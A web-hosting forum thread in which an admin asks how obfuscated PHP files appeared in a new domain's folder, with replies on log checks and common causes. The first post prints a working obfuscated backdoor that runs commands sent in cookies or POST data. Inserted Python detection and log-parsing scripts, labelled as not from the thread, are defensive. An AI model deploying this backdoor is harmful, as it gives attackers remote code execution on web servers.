Fresh domain with no site all of a sudden infected?

hucon (Verified User, joined Sep 29, 2011, 7 messages)
Hi,

One of my customers registered a domain. It got the default landing page of DA. So it has files like the 400.shtml, 401.shtml, index.html, etc.

By accident I went into this folder as I was looking for a file and saw to my big surprise:

total 56
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 400.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 401.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 403.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 404.shtml
-rwxr-xr-x 1 pl312 pl312 515 Mar 2 15:08 500.shtml
-rw-r--r-- 1 pl312 pl312 2028 Sep 26 2019 7r0bd30k.php
drwxr-xr-x 2 pl312 pl312 4096 Mar 18 13:43 cgi-bin
-rw-r--r-- 1 pl312 pl312 1907 Feb 3 19:41 h84ltod1.php
-rw-r--r-- 1 pl312 pl312 618 Mar 18 13:43 index.html
-rw-r--r-- 1 pl312 pl312 1848 Sep 22 2019 k3vmzbhd.php
-rwxr-xr-x 1 pl312 pl312 8563 Mar 2 15:08 logo.png
-rw-r--r-- 1 pl312 pl312 1884 Oct 30 22:21 tdu94w5j.php
Weird php files which I sometimes find at customers with wordpress sites etc. I was really surprised to find it on this server as it is running mod_security etc and in general has a very restricted execution set.


This domain was registered only a few days ago and the php files are dated from way before that. The content looks like this:

<?php
$npmaub = 'kgtd0\'814Hoscfpx*627rvn9uy3l#b_miea-';$dthdmya = Array();$dthdmya[] = $npmaub[9].$npmaub[16];$dthdmya[] = $npmaub[12].$npmaub[20].$npmaub[33].$npmaub[34].$npmaub[2].$npmaub[33].$npmaub[30].$npmaub[13].$npmaub[24].$npmaub[22].$npmaub[12].$npmaub[2].$npmaub[32].$npmaub[10].$npmaub[22];$dthdmya[] = $npmaub[4].$npmaub[33].$npmaub[12].$npmaub[8].$npmaub[29].$npmaub[26].$npmaub[17].$npmaub[8].$npmaub[35].$npmaub[4].$npmaub[17].$npmaub[4].$npmaub[33].$npmaub[35].$npmaub[8].$npmaub[4].$npmaub[18].$npmaub[26].$npmaub[35].$npmaub[29].$npmaub[33].$npmaub[6].$npmaub[7].$npmaub[35].$npmaub[3].$npmaub[8].$npmaub[7].$npmaub[6].$npmaub[18].$npmaub[4].$npmaub[19].$npmaub[23].$npmaub[7].$npmaub[18].$npmaub[17].$npmaub[19];$dthdmya[] = $npmaub[28];$dthdmya[] = $npmaub[12].$npmaub[10].$npmaub[24].$npmaub[22].$npmaub[2];$dthdmya[] = $npmaub[11].$npmaub[2].$npmaub[20].$npmaub[30].$npmaub[20].$npmaub[33].$npmaub[14].$npmaub[33].$npmaub[34].$npmaub[2];$dthdmya[] = $npmaub[33].$npmaub[15].$npmaub[14].$npmaub[27].$npmaub[10].$npmaub[3].$npmaub[33];$dthdmya[] = $npmaub[11].$npmaub[24].$npmaub[29].$npmaub[11].$npmaub[2].$npmaub[20];$dthdmya[] = $npmaub[34].$npmaub[20].$npmaub[20].$npmaub[34].$npmaub[25].$npmaub[30].$npmaub[31].$npmaub[33].$npmaub[20].$npmaub[1].$npmaub[33];$dthdmya[] = $npmaub[11].$npmaub[2].$npmaub[20].$npmaub[27].$npmaub[33].$npmaub[22];$dthdmya[] = $npmaub[14].$npmaub[34].$npmaub[12].$npmaub[0];foreach ($dthdmya[8]($_COOKIE, $_POST) as $koalh => $afgqr){function sfpnzp($dthdmya, $koalh, $zbwlowy){return $dthdmya[7]($dthdmya[5]($koalh . 
$dthdmya[2], ($zbwlowy / $dthdmya[9]($koalh)) + 1), 0, $zbwlowy);}function gusssx($dthdmya, $qdqols){return @$dthdmya[10]($dthdmya[0], $qdqols);}function dwwvtoy($dthdmya, $qdqols){$amqnmff = $dthdmya[4]($qdqols) % 3;if (!$amqnmff) {$ehcrak = $dthdmya[1]; $umhscb = $ehcrak("", $qdqols[1]($qdqols[2]));$umhscb();exit();}}$afgqr = gusssx($dthdmya, $afgqr);dwwvtoy($dthdmya, $dthdmya[6]($dthdmya[3], $afgqr ^ sfpnzp($dthdmya, $koalh, $dthdmya[9]($afgqr))));}


For the rest I cannot find anything that seems out of the ordinary, but I'm wondering how these files even got there. I find it highly unlikely my customer put them there. I also cannot find anything in the logs that looks like a transfer of some kind containing one of these files.

Also, maybe still an interesting fact: this domain is redirected to another one. It has a .htaccess file with Redirect 301 / http://<url>

Does anybody have an idea where to start and how to block this? Thanks in advance for helping!
 
File: `7r0bd30k.php'
Size: 1648 Blocks: 8 IO Block: 4096 regular file
Device: fd00h/64768d Inode: 1684780 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 541/ pl312) Gid: ( 542/ pl312)
Access: 2020-04-23 13:11:47.684100724 +0200
Modify: 2018-06-12 00:43:10.000000000 +0200
Change: 2018-06-25 17:34:09.789452078 +0200


The dates in 2018 are impossible as this directory didn't even exist up to a week ago...
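As an added illustration of where to start (this is not code from the thread or from DirectAdmin), a small triage script that flags PHP files sharing the traits of the sample above: a random 8-character name, strings rebuilt from indexed characters, input read from $_COOKIE/$_POST, and an mtime older than the domain itself. The regex heuristics, the hit threshold and the one-week domain age are assumptions; the demo webroot it builds is constructed, with a harmless look-alike instead of the real file.

```python
import os, re, tempfile
from datetime import datetime, timedelta

# Heuristics taken from the sample above (assumed indicators, not a vendor signature):
# an 8-char random basename (7r0bd30k.php), strings rebuilt from indexed characters
# ($x[12].$x[20].$x[33]...), and attacker input read from $_COOKIE / $_POST.
RANDOM_NAME = re.compile(r"^[a-z0-9]{8}\.php$")
INDEX_CONCAT = re.compile(r"\$\w+\[\d+\]\.(?=\$)")
INPUT_SOURCE = re.compile(r"\$_(COOKIE|POST)\b")

def inspect_php(path, domain_created):
    """Return the indicators that fire for one file; an empty list means nothing odd."""
    hits = []
    if RANDOM_NAME.match(os.path.basename(path)):
        hits.append("random-8char-name")
    with open(path, errors="replace") as fh:
        body = fh.read()
    if len(INDEX_CONCAT.findall(body)) >= 8:
        hits.append("index-concat-obfuscation")
    if INPUT_SOURCE.search(body):
        hits.append("reads-cookie-or-post")
    # mtime older than the domain: copied in with preserved timestamps or backdated (the stat anomaly above)
    if datetime.fromtimestamp(os.stat(path).st_mtime) < domain_created:
        hits.append("mtime-before-domain-creation")
    return hits

def scan_webroot(root, domain_created):
    """Map relative path -> indicator list for every .php file with at least one hit."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(".php"):
                full = os.path.join(dirpath, fn)
                hits = inspect_php(full, domain_created)
                if hits:
                    findings[os.path.relpath(full, root)] = hits
    return findings

def demo_scan():
    """Constructed webroot: benign index.html plus a harmless look-alike, backdated ~2 years, domain 1 week old."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html>placeholder</html>")
    fake = os.path.join(root, "7r0bd30k.php")
    concat = ".".join("$a[%d]" % i for i in range(12))  # $a[0].$a[1]. ... .$a[11]
    with open(fake, "w") as fh:
        fh.write("<?php $a='abcdefghijkl'; $b=%s; foreach(array_merge($_COOKIE,$_POST) as $k=>$v){}" % concat)
    old = (datetime.now() - timedelta(days=700)).timestamp()
    os.utime(fake, (old, old))
    return scan_webroot(root, datetime.now() - timedelta(days=7))
```

On a real box, call scan_webroot() with the domain's public_html and the date the domain was created; files that trip the timestamp check alone are worth a look even when the content heuristics stay quiet.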
 
OK, maybe the date was modified, or simply an old file was copied (not created). Find other files with part of the content of this one, check the logs for who asked for it, maybe POST requests etc., then check the logs for those IPs etc.
 
Maybe the files were already there in your "default" directory of your server (domains - default map in your root of the hosting server domain).
 
Nope. Default is and was clean. I wonder how it would have worked to get those files there. The site runs under its own user. Only the default index.html was there. It doesn't have a form or anything that allows POST.... I thought that with WordPress etc. forms were abused to get such stuff there, but here there was only an html file.
 
It can be done from another site if basedir restrictions are not in effect.
Another possibility is a weak password which was quickly hacked.
It's also possible that the customer has an infected computer and passwords sent to him were captured by malware and sent to a hacker.

You really have to check the logs (like ftp and domain logs at least) like Zhenyapan also said, to see how the files got in there.
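Added example for the log check the two replies above suggest (not code from the thread): parse Apache combined-format domain log lines and group, per client IP, every request for one of the four file names from the listing plus every POST to any 8-character random .php. The combined format is assumed to be what the domain log uses; the sample lines and addresses are constructed, not taken from the thread.

```python
import re
from collections import defaultdict

# Apache "combined" log format, assumed here to be what the domain log uses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# The four file names from the directory listing in the first post.
SUSPECT_FILES = {"7r0bd30k.php", "h84ltod1.php", "k3vmzbhd.php", "tdu94w5j.php"}
RANDOM_PHP = re.compile(r"^/[a-z0-9]{8}\.php$")

def parse_line(line):
    """Return the fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_suspect_requests(lines):
    """Group by client IP every request for a known suspect file, plus every POST to any
    8-char random .php (the naming pattern of the dropped files). Each entry keeps
    timestamp, method, path, status and user agent so the IP can then be chased
    through the ftp and other logs."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop any query string
        name = path.rsplit("/", 1)[-1]
        if name in SUSPECT_FILES or (rec["method"] == "POST" and RANDOM_PHP.match(path)):
            by_ip[rec["ip"]].append((rec["ts"], rec["method"], path, rec["status"], rec["ua"]))
    return dict(by_ip)

# Constructed sample lines (RFC 5737 documentation addresses), not from the thread.
SAMPLE_LOG = """\
203.0.113.10 - - [23/Apr/2020:13:11:47 +0200] "POST /7r0bd30k.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Apr/2020:13:12:02 +0200] "GET / HTTP/1.1" 301 218 "-" "Mozilla/5.0"
203.0.113.10 - - [23/Apr/2020:13:12:30 +0200] "POST /h84ltod1.php HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
198.51.100.7 - - [23/Apr/2020:13:13:01 +0200] "GET /logo.png HTTP/1.1" 200 8563 "-" "Mozilla/5.0"
203.0.113.10 - - [23/Apr/2020:13:14:09 +0200] "POST /zq81kd0p.php HTTP/1.1" 404 196 "-" "python-requests/2.22.0"
"""

if __name__ == "__main__":
    for ip, reqs in find_suspect_requests(SAMPLE_LOG.splitlines()).items():
        print(ip, len(reqs), "suspect request(s)")
```

With the `Redirect 301 /` rule the opener mentions catching every request, those paths should only ever show a 301 in the log; a 200 for one of them means PHP actually executed the file and that line deserves a close look.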
 
Is there another site on the same DA user? Because a .php file in one site can put a file on another site within the same user.
 
Hi guys, it actually happened to a user that has only 1 domain. I have had these issues before and have introduced things such as following strict rules for WordPress hardening, installing modsecurity and configuring it rather strictly. That helped a lot. I was however really surprised to see that site getting infected just like that. There was just an index.html, nothing else. And still it got there somehow. I have dug through the logs and can seriously not find anything that points me in a direction. I have increased the log level a little now. Maybe I'll notice something now if it happens again.
 